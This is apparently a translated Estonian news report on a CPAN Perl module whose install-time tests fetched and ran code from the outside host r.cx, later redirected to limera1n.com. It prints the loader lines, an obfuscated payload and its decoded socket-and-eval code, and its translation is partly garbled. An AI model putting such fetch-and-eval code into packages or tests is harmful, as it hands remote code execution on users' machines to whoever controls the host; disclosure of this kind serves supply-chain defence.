CPAN Perl-paketi, mis levitatakse kaudu , mis on mÔeldud CPAN-moodulite automaatseks laadimiseks reaalajas, kahjulik kood. Kahjulik kood oli testikoodist , mis on saadaval alates 2011. aastast.
Oluline on mainida, et kĂŒsimused kahtlase koodi laadimise kohta tekkisid juba 2016. aastal.
Kahjulik tegevus seisneb katses laadida ja kĂ€ivitada koodi kolmandalt serverilt (http://r.cx:1/) testkomplekti kĂ€itamise ajal, mis toimub mooduli installimise kĂ€igus. Eeldatakse, et algselt kolmandalt serverilt laaditud kood ei olnud kahjulik, kuid nĂŒĂŒd suunatakse pĂ€ringule domeenile ww.limera1n.com, misedastab oma koodi tĂ€itmiseks.
Laadimise korraldamiseks kasutatakse failis jÀrgmist koodi:
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Antud kood kÀivitab skripti , mille sisu on jÀrgmine:
use lib do{eval&&botstrap(«RCX»)if$b=new IO::Socket::INET 82.46.99.88.»:1âł};
See skript laadib kasutades teenust koodi vÀlisest hostist r.cx (aadressid 82.46.99.88 vastavad tekstile «R.cX») ja tÀidab selle eval plokis.
$ perl -MIO::Socket -eâ$b=new IO::Socket::INET 82.46.99.88.»:1âł; print ;â
eval unpack u=>q{_<'I;G1[)&(];F5W($E/.CI3;V-K970Z.DEâŠ.}
PÀrast dekompressiooni tÀidetakse :
print{$b=new IO::Socket::INET»ww.limera1n.com:80âł}»GET /iJailBreak
«;evalor return warn$@while$b;1
Praegu on probleemne paket eemaldatud hoidlalt (Perl Authors Upload Server), ja mooduli autori konto on blokeeritud. Samas jÀÀb moodul MetaCPAN arhiivi ja seda saab otse installida MetaCPANist kasutades mÔningaid utiliite, nagu cpanminus. , nii et pakett ei olnud laialdaselt levitatud.
Huvitav, et arutelu ja mooduli autor, kes lĂŒkkas ĂŒmber vĂ€ite, et kahjulik kood lisati pĂ€rast oma veebisaidi «r.cx» hĂ€kkimist, ning selgitas, et ta lihtsalt lĂ”butses ning perlobfuscator.com kasutas mitte peitmmiseks, vaid koodi suuruse vĂ€hendamiseks ja kopeerimise lihtsustamiseks lĂ”ikelauale. Funktsiooni «botstrap» valik on selgitatud, et see sĂ”na âkĂ”lab nagu bot ja on lĂŒhem kui bootstrapâ. Mooduli autor kinnitas ka, et tuvastatud manipulatsioonid ei tee kahjulikke toiminguid, vaid demonstreerivad koodi laadimist ja kĂ€ivitamist TCP ĂŒle.
Allikas: opennet.ru
